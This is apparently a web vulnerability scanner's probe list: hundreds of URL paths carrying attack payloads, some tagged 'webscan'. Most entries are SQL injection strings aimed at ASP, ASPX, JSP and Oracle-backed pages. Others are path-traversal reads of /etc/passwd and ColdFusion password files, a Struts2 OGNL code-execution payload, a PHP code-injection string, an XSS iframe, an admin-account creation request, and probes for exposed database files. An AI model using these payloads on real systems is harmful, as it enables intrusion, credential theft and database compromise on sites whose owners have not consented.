/?user&q=login&&q=check_email&email=test@sec.org%27%20and%20(Select%201%20from%20(Select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?user&q=login&&q=check_username&username=only_test%27%20and%20(Select%201%20from%20(Select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?user-getpass-1'
/?user-space-1'
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/API/GetPageHtml.aspx
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ActivityList.asp
/Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
/Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
/Admin/sqlPlatform/operateSql.aspx
/AdminP
/Adminiscentertrator/AdmIndex.asp
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/ApplyGuide.aspx?infoFlowId=00449'and((char(106)%2bchar(59))=1)--
/Article/?KeyWord=1'%20and%201=char(97)%20--
/Article/?Type=18%20/**/and/**/1=char(106)--
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Broadcast/BroadcastViewnew.aspx?type=InfoTPXW&InfoId=1'and%20(char(105)%2bchar(59))=1--
/Broadcast/ShowFormList.aspx?formId=1'%20and%20(char(106)%2bchar(58))=1--
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/CaiLiaoList.aspx?infoFlowId=1'%20and%20(char(106)%2bchar(58))=1--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/Bulletin/InfoBulletin.aspx?infoId=1'%20and%20(char(106)%2bchar(58))=1--
/Business/OfflineDownload.aspx?filetype=html&formid=1'%20and%20(char(106)%2bchar(58))=1--
/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
/CFIDE/administrator/logging/settings.cfm?locale=../../../../custommenu.xml%00en
/CVS/
/CVS/Root
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/CmxLogin.php?t=14431680671059
/Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
/Comm/UploadFile/webUpload.aspx?AttId=x.cer&FilePath=/../web
/CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-30002%20UNION%20SELECT%201,concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version()),3,4,5
/Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorporateCulture/kaizen_download.aspx?file_id=1')%20and%20(select%20char(86)%2bchar(76))%3E0--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/DataBase/%23$DB.mdb
/Databases/0791idc.mdb
/Databases/asp99cms.mdb
/Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/Directory/iframeAgencyFunctions.jsp?department_no=1'%20UNION%20ALL%20SELECT%20NULL,CHR(58)%7C%7CCHR(113)%7C%7CCHR(110)%7C%7CCHR(116)%7C%7CCHR(58)%7C%7CCHR(97)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(117)%7C%7CCHR(112)%7C%7CCHR(58),NULL%20FROM%20DUAL--%20
/Directory/showLeader.jsp?LeadId=-1%20UNION%20ALL%20SELECT%20NULL,CHR(58)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(89)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(58),NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&department_id=null&department_name=&department_no=1
/Directory/showNsjg.jsp?NsjgId=-1%20UNION%20ALL%20SELECT%20NULL,CHR(58)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(85)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(58)%20FROM%20DUAL--%20&department_id=&department_name=&department_no=013628024
/Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/DocCenterService/image?photo_id=10443&photo_size=../../../../../../../../../../etc/passwd%00
/Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/DownloadShow.asp
/Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
/ErrorInfDownLoad?errorName=/../../../../was/webroot/WEB-INF/web.xml
/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/ExportToExcel?method=txtDownload&destFile=/../../../../was/webroot/WEB-INF/web.xml
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
/FCKeditor/editor/filemanager/browser/default/browser.html/fckeditor/editor/dialog/fck_about.html
/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
/FWeb/WorkRoomWeb/Web/Index.aspx?TID=1002%20AND%208259%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2bCHAR%28108%29%2bCHAR%28105%29%2bCHAR%28117%29%2bCHAR%28113%29%2b%28SELECT%20%28CASE%20WHEN%20%288259%3D8259%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%28113%29%2bCHAR%28112%29%2bCHAR%28111%29%2bCHAR%28116%29%2bCHAR%28113%29%29%29
/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
/FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
/Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
/FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
/FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/Global.asa
/Global.asax
/Global.asax.cs
/Goods-showcate-id-1.html'cfreer
/Guest/Baike/Details.aspx?soure=manager&tittle=1'/**/aNd/**/char(106)=1/**/--
/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/Inc/conn.asp
/Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/InteractiveCommunication/ProjectList.aspx?sxname=1'%20and%20(char(106)%2bchar(59))=1%20and%20'%25'='
/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Login.asp
/Login.aspx
/Login.aspx?APPSecret=-12'%20and%201=char(66)%20--
/Login.jsp
/Login.php
/LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
/MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
/Manual/Manual.jsp?depid=-2550'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(116)%7C%7CCHR(109)%7C%7CCHR(103)%7C%7CCHR(113)%7C%7CCHR(112)%7C%7CCHR(105)%7C%7CCHR(82)%7C%7CCHR(76)%7C%7CCHR(100)%7C%7CCHR(99)%7C%7CCHR(76)%7C%7CCHR(99)%7C%7CCHR(71)%7C%7CCHR(83)%7C%7CCHR(113)%7C%7CCHR(97)%7C%7CCHR(97)%7C%7CCHR(122)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
/MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
/MockLogin.aspx
/ModifyNewsAction.do?newsID=-12
/ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
/ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
/MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
/MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
/NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
/NTBookAdvancedSearch.aspx?publishFrom=0&publishTo=0&KeyWord1=2&Index1=4&Index2=5&KeyWord2=11111&Index3=6&KeyWord3=just'%7C%7C(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(109)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(107)%7C%7CCHR(77)%7C%7CCHR(85)))%20FROM%20DUAL)%7C%7C'
/NTBookRetr.aspx?page=1&Index=2&LocLmt=&SrchTab=0&Acurate=0&KeyWord=1111'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%202918=2918%20AND%205953=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(103)%7C%7CCHR(99)%7C%7CCHR(98)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(5953=5953)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL))%7C%7C'
/NTBookRetrNewBookDetail.aspx?page=1&Index=6&ClassKey=E'+and+1=(SELECT%201%20FROM%20DUAL%20WHERE%202918=2918%20AND%205953=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(103)%7C%7CCHR(99)%7C%7CCHR(98)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(5953=5953)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL))%20AND%20'1'='1
/NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
/NTClassDis.aspx?Index=6&KeyWord=1&ALLNAME=1&SrchTab=4&Index2=0&KeyWord2=just'%7C%7C(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(109)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(87)%7C%7CCHR(77)%7C%7CCHR(85)))%20FROM%20DUAL)%7C%7C'
/NTHoldingRetr.aspx?BIBNO=1&DISP=Holding&TABNAME=ILASBIBLIOS%20where%201=1%20AND%201883=(SELECT%201%20FROM%20DUAL%20WHERE%202918=2918%20AND%205953=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(103)%7C%7CCHR(99)%7C%7CCHR(98)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(5953=5953)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL))%20--
/NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
/NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
/NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
/NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
/NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
/NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/NewsClass.asp
/NewsList.asp
/News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
/OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
/ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Open/DegreeStudentOpen.aspx?xsfl=aaa%27%20and%20@@version=0%20and%20%271%27=%271
/Open/ExpertInfo.aspx?zjbh=aaaa'%20and%20@@version=0%20and%20'1'='1
/OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
/Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
/PersonalAffair/worklog_template_show.aspx?id=(select%20char(69)%2bchar(65))
/Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/ProcManage/WebHouse/HousePic.aspx
/Product.asp
/ProductBuy.Asp
/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
/ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
/ProjectManage/pm_gatt_inc.aspx?project_id=(select%20char(89)%2bchar(65))
/Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
/Public/GetPhoto.aspx?type=10&id=1111'%20and%20@@version=0%20and%20'1'='1
/R9iPortal/cm/cm_info_list.jsp?itype_id=3%20UNION%20ALL%20SELECT%2056,CHAR%28113%29%2bCHAR%28111%29%2bCHAR%28116%29%2bCHAR%2871%29%2bCHAR%2880%29%2bCHAR%2882%29%2bCHAR%2881%29%2bCHAR%2872%29%2bCHAR%28113%29%2bCHAR%28120%29%2bCHAR%28101%29,56,56,56,56,56,56,56,56,56--
/RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
/RdrRInforDetail.aspx?page=1&Index=4&KeyWord=a&AcqSys=CN&name=r_infor%20where%201=1%20AND%202046=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(58)%7C%7CCHR(103)%7C%7CCHR(109)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(2046=2046)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(113)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(104)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
